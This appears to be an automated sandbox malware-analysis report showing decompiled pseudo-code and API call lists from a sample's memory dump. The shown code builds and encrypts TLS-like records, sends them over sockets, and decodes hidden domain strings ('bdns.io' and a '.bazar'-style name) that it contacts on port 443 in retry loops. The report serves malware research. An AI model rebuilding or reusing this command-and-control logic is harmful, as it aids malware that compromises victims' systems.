      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DEB9
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DEC3
      • Part of subcall function 0039DCD0: SysFreeString.OLEAUT32(?), ref: 0039DECD
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 00393F48
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 00393F5D
      • Part of subcall function 00393E30: _wtoi.MSVCRT ref: 0039400E
      • Part of subcall function 00393E30: rand.MSVCRT ref: 00394080
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 0039422F
      • Part of subcall function 00393E30: SysFreeString.OLEAUT32(?), ref: 0039423D
    • SysFreeString.OLEAUT32(?), ref: 0039AC49
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 18%
    			E003AFD0B(void* _a4, char _a8, signed int _a12) {
    				char _v5;
    				char _v6;
    				char _v7;
    				void* _v8;
    				signed int _v9;
    				char _v10;
    				char _v11;
    				void _v12;
    				char* _v16;
    				signed int _v20;
    				void _v44;
    				signed int _t83;
    				signed int _t89;
    				void* _t98;
    				int _t99;
    				short _t108;
    				short _t109;
    				signed int _t116;
    				intOrPtr* _t120;
    				signed int _t130;
    				signed int _t132;
    				void* _t146;
    				int _t148;
    				intOrPtr* _t153;
    				void* _t155;
    				void* _t156;
    				signed int _t159;
    				char* _t160;
    				void* _t163;
    
    				_t120 = _a4;
    				_t148 = _a12;
    				if(( *(_t120 + 0x10070) & 0x00000001) != 0 && _t148 != 0) {
    					_t4 =  &_a8; // 0x3a407c
    					E003AFD0B(_t120,  *_t4, 0);
    					_t163 = _t163 + 0xc;
    				}
    				_t156 =  *0x3b8538(_t148 + 0x40);
    				_a4 = _t156;
    				_v16 =  *0x3b8538(_t148 + 0x40);
    				_t83 =  *(_t120 + 0x10074);
    				_v12 = _t83 >> 0x18;
    				_v11 = _t83 >> 0x10;
    				_v10 = _t83 >> 8;
    				_v9 = _t83;
    				_v8 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x18;
    				_v20 = _t83;
    				_v7 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 0x10;
    				_v5 =  *(_t120 + 0x10070);
    				 *_t156 = _v12;
    				_v6 = (_t83 << 0x00000020 |  *(_t120 + 0x10070)) >> 8;
    				 *((intOrPtr*)(_t156 + 4)) = _v8;
    				_t89 =  *(_t120 + 0x10070) |  *(_t120 + 0x10074);
    				if(_t89 != 0) {
    					 *((char*)(_t156 + 8)) = 0x17;
    				} else {
    					 *((char*)(_t156 + 8)) = 0x16;
    				}
    				 *((short*)(_t156 + 9)) = 0x103;
    				__imp__#9(_t148);
    				_t43 =  &_a8; // 0x3a407c
    				 *(_t156 + 0xb) = _t89;
    				_t45 = _t156 + 0xd; // 0xd
    				memcpy(_t45,  *_t43, _t148);
    				E003AEC77(_t120 + 4, 0x14, _t156, _t148 + 0xd,  &_v44);
    				_t49 =  &_a8; // 0x3a407c
    				memcpy(_t156,  *_t49, _t148);
    				_t146 = _t156 + _t148;
    				_t130 = 5;
    				memcpy(_t146,  &_v44, _t130 << 2);
    				_t132 = _a12;
    				_t159 = _t132 + 0x00000014 & 0x8000000f;
    				if(_t159 < 0) {
    					_t159 = (_t159 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				_t98 = 0x10;
    				_t99 = _t98 - _t159;
    				if(_t99 != 0) {
    					if(_t99 == 1) {
    						_push(0x11);
    						goto L12;
    					}
    				} else {
    					_push(0x10);
    					L12:
    					_pop(_t99);
    				}
    				_t56 = _t132 + 0x14; // 0x25
    				_v8 = _t99 + _t56;
    				memset(_t146 + 0x14, _t99 - 1, _t99);
    				_t160 = _v16;
    				if(E003AEF6B(_a4, _t99 + _t56, _t160 + 5, _t120 + 0x2c, _t120 + 0x4c, 1) != 0) {
    					if(( *(_t120 + 0x10070) |  *(_t120 + 0x10074)) != 0) {
    						 *_t160 = 0x17;
    					} else {
    						 *_t160 = 0x16;
    					}
    					_t153 = __imp__#9;
    					_t108 =  *_t153(0x301);
    					 *((short*)(_t160 + 1)) = _t108;
    					_t109 =  *_t153(_v8);
    					_t155 = _v8 + 5;
    					 *((short*)(_t160 + 3)) = _t109;
    					__imp__#19( *_t120, _t160, _t155, 0);
    					_v16 = _t109;
    					 *0x3b8540(_t160);
    					 *0x3b8540(_a4);
    					 *(_t120 + 0x10070) =  *(_t120 + 0x10070) + 1;
    					asm("adc dword [ebx+0x10074], 0x0");
    					asm("sbb eax, eax");
    					_t116 =  !( ~(_v16 - _t155)) & _a12;
    				} else {
    					 *0x3b8540(_t160);
    					 *0x3b8540(_a4);
    					_t116 = 0;
    				}
    				return _t116;
    			}

































    APIs
    • htons.WS2_32(?), ref: 003AFDE5
    • memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC88
      • Part of subcall function 003AEC77: memset.MSVCRT ref: 003AEC98
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECA7
      • Part of subcall function 003AEC77: memcpy.MSVCRT ref: 003AECB9
    • memcpy.MSVCRT ref: 003AFE15
    • memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AEF6B: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000024,?,?,00000001,?,0000000F,00000010), ref: 003AEFA8
      • Part of subcall function 003AEF6B: CryptImportKey.ADVAPI32(00000000,00000000,0000001C,00000000,00000000,00000010,00000010), ref: 003AEFF7
      • Part of subcall function 003AEF6B: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 003AF00A
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF01E
      • Part of subcall function 003AEF6B: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000000), ref: 003AF040
      • Part of subcall function 003AEF6B: CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 003AF05D
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF06A
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF074
      • Part of subcall function 003AEF6B: memcpy.MSVCRT ref: 003AF0AA
      • Part of subcall function 003AEF6B: CryptDestroyKey.ADVAPI32(?), ref: 003AF0B5
      • Part of subcall function 003AEF6B: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003AF0C0
    • htons.WS2_32(00000301), ref: 003AFEB9
    • htons.WS2_32(?), ref: 003AFEC2
    • send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 92%
    			E003B0DAA(void* __eax, void* __ebx, intOrPtr __edi, intOrPtr __esi) {
    				void* _t60;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t76;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr* _t86;
    				intOrPtr _t87;
    				intOrPtr _t88;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				intOrPtr _t94;
    				intOrPtr _t100;
    				void* _t102;
    				intOrPtr _t104;
    				intOrPtr _t106;
    				intOrPtr _t116;
    				intOrPtr* _t117;
    				void* _t118;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				intOrPtr _t125;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t139;
    				intOrPtr _t140;
    				intOrPtr _t142;
    				intOrPtr _t143;
    				intOrPtr _t144;
    				void* _t145;
    				intOrPtr _t146;
    				intOrPtr* _t148;
    				void* _t149;
    				intOrPtr _t150;
    				intOrPtr _t151;
    				intOrPtr _t152;
    				intOrPtr _t153;
    				void* _t154;
    				void* _t156;
    				void* _t157;
    
    				L0:
    				while(1) {
    					L0:
    					_t146 = __esi;
    					_t140 = __edi;
    					_t102 = __ebx;
    					L0039A47E();
    					_t157 = _t156 + 4;
    					if(__eax == 0) {
    						goto L6;
    					} else {
    						 *((intOrPtr*)(_t154 - 0x1c)) = L003B1DC0(_t76);
    						goto L7;
    					}
    					L8:
    					_t12 = _t154 - 0x90; // 0x736e6462
    					 *((intOrPtr*)(_t154 - 0x80)) = 0x7261;
    					 *((intOrPtr*)(_t154 - 0x84)) = 0x7a61622e;
    					 *((intOrPtr*)(_t154 - 0x88)) = 0x74737572;
    					 *((intOrPtr*)(_t154 - 0x8c)) = 0x74656661;
    					 *((intOrPtr*)(_t154 - 0x90)) = _t140;
    					_t79 = E00391170(_t12, 0xfde9, _t154 - 8, 0xffffffff);
    					_t157 = _t157 + 0x10;
    					if(_t79 == 0) {
    						L51:
    						_t61 =  *((intOrPtr*)(_t154 - 0x14));
    						if( *((intOrPtr*)(_t154 - 0x14)) != 0) {
    							E0039BB40(_t61);
    							_t157 = _t157 + 4;
    						}
    						_t62 =  *((intOrPtr*)(_t154 - 0x10));
    						if( *((intOrPtr*)(_t154 - 0x10)) != 0) {
    							E0039BB40(_t62);
    							_t157 = _t157 + 4;
    						}
    						_t63 =  *((intOrPtr*)(_t154 - 8));
    						if( *((intOrPtr*)(_t154 - 8)) != 0) {
    							E0039BB40(_t63);
    							_t157 = _t157 + 4;
    						}
    						_t64 =  *((intOrPtr*)(_t154 - 0xc));
    						if( *((intOrPtr*)(_t154 - 0xc)) != 0) {
    							E0039BB40(_t64);
    							_t157 = _t157 + 4;
    						}
    						_t65 =  *((intOrPtr*)(_t154 - 0x1c));
    						if(_t65 != 0) {
    							_push(_t65);
    							L00391CB0();
    						}
    						_t66 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xac))))(0x3b8600);
    						_t130 =  *0x3b8628; // 0x593938
    						 *0x3b8618 =  *0x3b8618 - 1;
    						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0xc4))))(0x3b8600);
    						return  *((intOrPtr*)(_t154 - 0x18));
    					}
    					L9:
    					_t148 =  *((intOrPtr*)(_t154 - 0x1c));
    					_push(_t154 - 0x2c);
    					_push( *((intOrPtr*)(_t154 - 8)));
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t148))))() != 0 &&  *((intOrPtr*)(_t154 - 0x2c)) == 0xc8) {
    						L13:
    						_t85 =  *((intOrPtr*)( *((intOrPtr*)( *_t148 + 0xc))))(_t154 - 0xc, _t154 - 0x28);
    						__eflags = _t85;
    						if(_t85 == 0) {
    							goto L51;
    						}
    						L14:
    						_t116 =  *((intOrPtr*)(_t154 - 0x28));
    						__eflags = _t116 - 6;
    						if(_t116 <= 6) {
    							goto L51;
    						}
    						L15:
    						_t86 =  *((intOrPtr*)(_t154 - 0xc));
    						_t149 = _t116 + _t86;
    						__eflags = _t86 - _t149;
    						if(_t86 >= _t149) {
    							L19:
    							_t117 = _t86;
    							__eflags = _t86 - _t149;
    							if(_t86 >= _t149) {
    								L25:
    								_t118 = _t117 - _t86;
    								__eflags = _t118 - 6;
    								if(_t118 <= 6) {
    									goto L51;
    								}
    								L26:
    								__eflags = _t118 - 0x10;
    								if(_t118 >= 0x10) {
    									goto L51;
    								}
    								L27:
    								_t87 = E00391170(_t86, 0, _t154 - 0x14, _t118);
    								_t157 = _t157 + 0x10;
    								__eflags = _t87;
    								if(_t87 == 0) {
    									goto L51;
    								}
    								L28:
    								_t104 =  *((intOrPtr*)(_t154 + 0xc));
    								_t150 = 0;
    								__eflags = 0;
    								while(1) {
    									L29:
    									_t88 = L003994D0(_t104,  *((intOrPtr*)(_t154 - 0x14)), 0x1bb);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										break;
    									}
    									L30:
    									_t100 =  *0x3b8628; // 0x593938
    									_t150 = _t150 + 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc8))))(0x7530);
    									__eflags = _t150 - 0x14;
    									if(_t150 < 0x14) {
    										continue;
    									}
    									break;
    								}
    								L31:
    								__eflags = _t150 - 0x14;
    								if(_t150 == 0x14) {
    									goto L51;
    								}
    								L32:
    								_t151 = 0;
    								__eflags = 0;
    								 *((intOrPtr*)(_t154 - 4)) = 0;
    								while(1) {
    									L33:
    									_t90 = E0039D890(_t151, __eflags,  *((intOrPtr*)(_t154 + 8)), _t104, _t154 - 4);
    									_t157 = _t157 + 0xc;
    									__eflags = _t90;
    									if(_t90 == 0) {
    										break;
    									}
    									L34:
    									_t125 =  *0x3b8628; // 0x593938
    									_t151 = _t151 + 1;
    									 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc8))))(0x7530);
    									__eflags = _t151 - 0x14;
    									if(__eflags < 0) {
    										continue;
    									}
    									L35:
    									L38:
    									__eflags = _t151 - 0x14;
    									if(_t151 == 0x14) {
    										goto L51;
    									}
    									L39:
    									_t143 =  *((intOrPtr*)(_t154 + 8));
    									_t152 = 0;
    									__eflags = 0;
    									 *((intOrPtr*)(_t154 - 4)) = 0;
    									while(1) {
    										L40:
    										_t92 = E003A1B80(_t152, _t143, _t104, _t154 - 4);
    										_t157 = _t157 + 0xc;
    										__eflags = _t92;
    										if(_t92 == 0) {
    											break;
    										}
    										L41:
    										_t123 =  *0x3b8628; // 0x593938
    										_t152 = _t152 + 1;
    										 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xc8))))(0x7530);
    										__eflags = _t152 - 0x14;
    										if(_t152 < 0x14) {
    											continue;
    										}
    										L42:
    										L45:
    										__eflags = _t152 - 0x14;
    										if(_t152 == 0x14) {
    											goto L51;
    										}
    										L46:
    										_t153 = 0;
    										__eflags = 0;
    										_t145 = _t104 + 8;
    										while(1) {
    											L47:
    											_t94 = E00391FE0(_t104, _t145, _t153,  *((intOrPtr*)(_t154 + 8)), _t104, _t145);
    											_t157 = _t157 + 0xc;
    											__eflags = _t94;
    											if(_t94 != 0) {
    												break;
    											}
    											L48:
    											_t121 =  *0x3b8628; // 0x593938
    											_t153 = _t153 + 1;
    											 *((intOrPtr*)( *((intOrPtr*)(_t121 + 0xc8))))(0x7530);
    											__eflags = _t153 - 0x64;
    											if(_t153 < 0x64) {
    												continue;
    											}
    											break;
    										}
    										L49:
    										__eflags = _t153 - 0x64;
    										if(_t153 != 0x64) {
    											 *((intOrPtr*)(_t154 - 0x18)) = 1;
    										}
    										goto L51;
    									}
    									L43:
    									_t144 =  *((intOrPtr*)(_t154 - 4));
    									__eflags = _t144;
    									if(_t144 != 0) {
    										E00391380(_t144);
    										_push(_t144);
    										L00391CB0();
    										_t157 = _t157 + 4;
    									}
    									goto L45;
    								}
    								L36:
    								_t142 =  *((intOrPtr*)(_t154 - 4));
    								__eflags = _t142;
    								if(_t142 != 0) {
    									E00392DE0(_t142);
    									_push(_t142);
    									L00391CB0();
    									_t157 = _t157 + 4;
    								}
    								goto L38;
    							}
    							L20:
    							do {
    								L21:
    								_t139 =  *_t117;
    								__eflags = _t139 - 0x30;
    								if(_t139 < 0x30) {
    									L23:
    									__eflags = _t139 - 0x2e;
    									if(_t139 != 0x2e) {
    										goto L25;
    									}
    									goto L24;
    								}
    								L22:
    								__eflags = _t139 - 0x39;
    								if(_t139 <= 0x39) {
    									goto L24;
    								}
    								goto L23;
    								L24:
    								_t117 = _t117 + 1;
    								__eflags = _t117 - _t149;
    							} while (_t117 < _t149);
    							goto L25;
    						} else {
    							goto L16;
    						}
    						do {
    							L16:
    							_t127 =  *_t86;
    							__eflags = _t127 - 0x30;
    							if(_t127 < 0x30) {
    								goto L18;
    							}
    							L17:
    							__eflags = _t127 - 0x39;
    							if(_t127 <= 0x39) {
    								goto L19;
    							}
    							L18:
    							_t86 = _t86 + 1;
    							__eflags = _t86 - _t149;
    						} while (_t86 < _t149);
    						goto L19;
    					}
    					L11:
    					_t106 =  *0x3b8628; // 0x593938
    					_t102 = _t102 + 1;
    					 *((intOrPtr*)( *((intOrPtr*)(_t106 + 0xc8))))("h N");
    					if(_t102 < 0x1e) {
    						L1:
    						 *((intOrPtr*)(_t154 - 0x8c)) = 0x6f692e;
    						 *((intOrPtr*)(_t154 - 0x90)) = 0x736e6462;
    						_t60 = E00391170(_t154 - 0x90, 0xfde9, _t154 - 0x10, 0xffffffff);
    						_t157 = _t157 + 0x10;
    						_t161 = _t60;
    						if(_t60 == 0) {
    							goto L51;
    						}
    						L2:
    						_t146 =  *((intOrPtr*)(_t154 - 0x10));
    						_t76 = E003B1280(_t161,  *((intOrPtr*)(_t154 - 0x10)));
    						_t157 = _t157 + 4;
    						_push(0x1c);
    						if(_t76 == 0) {
    							L4:
    							L0039A47E();
    							_t157 = _t157 + 4;
    							__eflags = _t76;
    							if(_t76 == 0) {
    								goto L6;
    							} else {
    								 *((intOrPtr*)(_t154 - 0x1c)) = E003B1D30(_t76);
    								L7:
    								_push(0x1bb);
    								_push(_t146);
    								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 - 0x1c)))) + 8))))() == 0) {
    									goto L11;
    								}
    								goto L8;
    							}
    						} else {
    							continue;
    						}
    					}
    					L12:
    					goto L51;
    					L6:
    					 *((intOrPtr*)(_t154 - 0x1c)) = 0;
    					goto L7;
    				}
    			}












































    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0DAA
    • ??3@YAXPAX@Z.MSVCRT ref: 003B1082
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 72%
    			E00393E30(intOrPtr __ecx, intOrPtr* _a4) {
    				signed int _v8;
    				void* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				intOrPtr* _v28;
    				intOrPtr _v32;
    				signed int _v36;
    				void* _v40;
    				signed int _v44;
    				intOrPtr* _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				short _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				signed int _v72;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				char _v280;
    				signed int _t171;
    				signed int _t172;
    				intOrPtr* _t173;
    				intOrPtr* _t174;
    				intOrPtr* _t180;
    				intOrPtr _t188;
    				signed int _t198;
    				signed int _t207;
    				signed int _t208;
    				intOrPtr* _t209;
    				intOrPtr* _t212;
    				void* _t214;
    				intOrPtr* _t218;
    				signed int _t220;
    				intOrPtr _t227;
    				intOrPtr _t229;
    				intOrPtr _t230;
    				intOrPtr _t231;
    				signed int _t234;
    				signed int _t236;
    				signed int _t242;
    				signed int _t244;
    				intOrPtr _t267;
    				intOrPtr _t271;
    				intOrPtr _t274;
    				signed int _t276;
    				intOrPtr* _t277;
    				signed int _t278;
    				intOrPtr* _t279;
    				intOrPtr* _t293;
    				signed int _t304;
    				intOrPtr* _t306;
    				intOrPtr _t308;
    				intOrPtr _t310;
    				signed int _t312;
    				intOrPtr* _t313;
    				void* _t314;
    				intOrPtr _t316;
    				void* _t317;
    				void* _t318;
    				void* _t320;
    				void* _t321;
    
    				_t306 = _a4;
    				_t244 = 0;
    				_t310 = __ecx;
    				_push( &_v60);
    				_push(_t306);
    				_v56 = __ecx;
    				_v8 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v12 = 0;
    				_v16 = 0;
    				_v52 = 0;
    				_v40 = 0;
    				_v60 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x58))))() < 0 || _v60 != 0xffff) {
    					L62:
    					_t171 = _v24;
    					if(_t171 != _t244) {
    						__imp__#6(_t171);
    					}
    					_t172 = _v20;
    					if(_t172 != _t244) {
    						__imp__#6(_t172);
    					}
    					_t173 = _v16;
    					if(_t173 != _t244) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 8))))(_t173);
    					}
    					_t174 = _v40;
    					if(_t174 != _t244) {
    						 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
    					}
    					return _v52;
    				} else {
    					_push( &_v40);
    					_push(_t306);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x30))))() < 0) {
    						goto L62;
    					}
    					_t180 = _v40;
    					_push( &_v8);
    					_push(_t180);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))() < 0) {
    						goto L62;
    					}
    					_v28 = E003A1D90(_v8 * 4, 0);
    					_v32 = E003A1D90(_v8 * 4, 0);
    					_t308 = E003A1D90(_v8 * 8, 0);
    					_t188 = E003A1D90(_v8 * 8, 0);
    					_t318 = _t317 + 0x20;
    					_v68 = _t188;
    					if(_v28 == 0) {
    						L60:
    						_t189 = _v32;
    						if(_v32 != _t244) {
    							E0039BB40(_t189);
    						}
    						goto L62;
    					}
    					if(_v32 == 0 || _t308 == 0 || _t188 == 0) {
    						L59:
    						E0039BB40(_v28);
    						_t318 = _t318 + 4;
    						goto L60;
    					} else {
    						if(_v8 <= 0) {
    							L46:
    							_t192 =  *((intOrPtr*)(_t310 + 0x1c));
    							if( *((intOrPtr*)(_t310 + 0x1c)) != 0) {
    								E0039BB40(_t192);
    								_t318 = _t318 + 4;
    							}
    							_t193 =  *((intOrPtr*)(_t310 + 0x20));
    							if( *((intOrPtr*)(_t310 + 0x20)) != 0) {
    								E0039BB40(_t193);
    								_t318 = _t318 + 4;
    							}
    							 *((intOrPtr*)(_t310 + 0x1c)) = E003A1D90(_v8 * 4, 0);
    							 *((intOrPtr*)(_t310 + 0x20)) = E003A1D90(_v8 * 4, 0);
    							_t198 = 0;
    							_t318 = _t318 + 0x10;
    							if(_v8 <= 0) {
    								L53:
    								_t199 =  *((intOrPtr*)(_t310 + 0x24));
    								if( *((intOrPtr*)(_t310 + 0x24)) != 0) {
    									E0039BB40(_t199);
    									_t318 = _t318 + 4;
    								}
    								_t200 =  *((intOrPtr*)(_t310 + 0x28));
    								if( *((intOrPtr*)(_t310 + 0x28)) != 0) {
    									E0039BB40(_t200);
    									_t318 = _t318 + 4;
    								}
    								 *((intOrPtr*)(_t310 + 0x24)) = _t308;
    								 *((intOrPtr*)(_t310 + 0x28)) = _v68;
    								 *((intOrPtr*)(_t310 + 0x18)) = _v8;
    								_v52 = 1;
    								L58:
    								_t244 = 0;
    								goto L59;
    							} else {
    								do {
    									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x1c)) + _t198 * 4)) =  *((intOrPtr*)(_v28 +  *(_t308 + _t198 * 8) * 4));
    									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x20)) + _t198 * 4)) =  *((intOrPtr*)(_v32 +  *(_t308 + _t198 * 8) * 4));
    									 *(_t308 + _t198 * 8) = 0;
    									 *(_t308 + 4 + _t198 * 8) = 0;
    									_t198 = _t198 + 1;
    								} while (_t198 < _v8);
    								goto L53;
    							}
    						}
    						_t293 = _v28;
    						_a4 = _t308;
    						_v48 = _t293;
    						_v64 = _v32 - _t293;
    						_v80 = _t188 - _t308;
    						while(1) {
    							_t207 = _v20;
    							if(_t207 != 0) {
    								__imp__#6(_t207);
    							}
    							_t208 = _v24;
    							_v20 = 0;
    							if(_t208 != 0) {
    								__imp__#6(_t208);
    							}
    							_t209 = _v40;
    							_push( &_v16);
    							_v24 = 0;
    							_push(_t244);
    							_push(_t209);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x1c))))() < 0) {
    								goto L58;
    							}
    							_t212 = _v16;
    							_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0xa4))))(_t212,  &_v24);
    							_t334 = _t214;
    							if(_t214 < 0) {
    								goto L58;
    							}
    							E00399090(_t334,  &_v280, 0x28);
    							_t267 =  *0x3b8628; // 0x593938
    							_t318 = _t318 + 8;
    							_push( &_v280);
    							_push(_v24);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0xe0))))() != 0) {
    								L45:
    								_t218 = _v16;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 8))))(_t218);
    								_v48 = _v48 + 4;
    								_a4 = _a4 + 8;
    								_t244 = _t244 + 1;
    								_v16 = 0;
    								if(_t244 < _v8) {
    									continue;
    								}
    								goto L46;
    							}
    							_t220 = _v16;
    							_push( &_v20);
    							_push(_t220);
    							if( *((intOrPtr*)( *((intOrPtr*)( *_t220 + 0x68))))() < 0) {
    								goto L58;
    							}
    							_t312 = E00397B80(_v20, 0x3b330c,  &_v12, 2);
    							_t320 = _t318 + 0x10;
    							if(_t312 != 2) {
    								__eflags = _t312;
    								if(_t312 <= 0) {
    									L73:
    									E0039BB40(_v12);
    									_t318 = _t320 + 4;
    									goto L58;
    								} else {
    									goto L72;
    								}
    								do {
    									L72:
    									_t271 =  *((intOrPtr*)(_v12 + _t312 * 4 - 4));
    									_t312 = _t312 - 1;
    									E0039BB40(_t271);
    									_t320 = _t320 + 4;
    									__eflags = _t312;
    								} while (_t312 > 0);
    								goto L73;
    							}
    							_t227 = _v12;
    							__imp___wtoi( *((intOrPtr*)(_t227 + 4)));
    							_t313 = _v48;
    							 *((intOrPtr*)(_v64 + _t313)) = _t227;
    							_t229 = E003966C0( *_v12);
    							_t274 = _v80;
    							 *_t313 = _t229;
    							_t230 = _a4;
    							_t321 = _t320 + 8;
    							 *(_t274 + _t230) = 0;
    							 *(_t274 + _t230 + 4) = 0;
    							_t314 = 8;
    							do {
    								_t231 =  *((intOrPtr*)(_t314 + _v12 - 4));
    								_t314 = _t314 - 4;
    								E0039BB40(_t231);
    								_t321 = _t321 + 4;
    							} while (_t314 > 0);
    							E0039BB40(_v12);
    							_t318 = _t321 + 4;
    							_v44 = 0;
    							do {
    								_t234 = rand();
    								asm("cdq");
    								_t304 = _t234 % _v8;
    								_t276 = 0;
    								_t236 = _t304;
    								_v36 = _t236;
    								if(_t244 <= 0) {
    									L27:
    									if(_t276 == _t244) {
    										_t277 = _a4;
    										asm("cdq");
    										 *_t277 = _v36;
    										 *(_t277 + 4) = _t304;
    										L31:
    										if(_v44 != 0x3e8) {
    											L44:
    											_t310 = _v56;
    											goto L45;
    										}
    										_t316 = _v36 + 1;
    										if(_t316 == _v36) {
    											goto L44;
    										} else {
    											goto L33;
    										}
    										do {
    											L33:
    											if(_t316 == _v8) {
    												_t316 = 0;
    											}
    											_t278 = 0;
    											if(_t244 <= 0) {
    												L40:
    												if(_t278 == _t244) {
    													_t279 = _a4;
    													asm("cdq");
    													 *_t279 = _t316;
    													 *(_t279 + 4) = _t304;
    													goto L44;
    												}
    											} else {
    												asm("cdq");
    												_v76 = _t316;
    												_v72 = _t304;
    												while(1) {
    													_t304 =  *(_t308 + _t278 * 8);
    													if(_t304 == _v76 &&  *((intOrPtr*)(_t308 + 4 + _t278 * 8)) == _v72) {
    														goto L40;
    													}
    													_t278 = _t278 + 1;
    													if(_t278 < _t244) {
    														continue;
    													}
    													goto L40;
    												}
    												goto L40;
    											}
    											_t316 = _t316 + 1;
    										} while (_t316 != _v36);
    										goto L44;
    									}
    									goto L28;
    								}
    								asm("cdq");
    								while( *((intOrPtr*)(_t308 + _t276 * 8)) != _t236 ||  *((intOrPtr*)(_t308 + 4 + _t276 * 8)) != _t304) {
    									_t276 = _t276 + 1;
    									if(_t276 < _t244) {
    										continue;
    									}
    									goto L27;
    								}
    								goto L27;
    								L28:
    								_t242 = _v44 + 1;
    								_v44 = _t242;
    							} while (_t242 < 0x3e8);
    							goto L31;
    						}
    						goto L58;
    					}
    				}
    			}

    APIs
    • SysFreeString.OLEAUT32(?), ref: 00393F48
    • SysFreeString.OLEAUT32(?), ref: 00393F5D
    • _wtoi.MSVCRT ref: 0039400E
    • rand.MSVCRT ref: 00394080
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • SysFreeString.OLEAUT32(?), ref: 0039422F
    • SysFreeString.OLEAUT32(?), ref: 0039423D
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
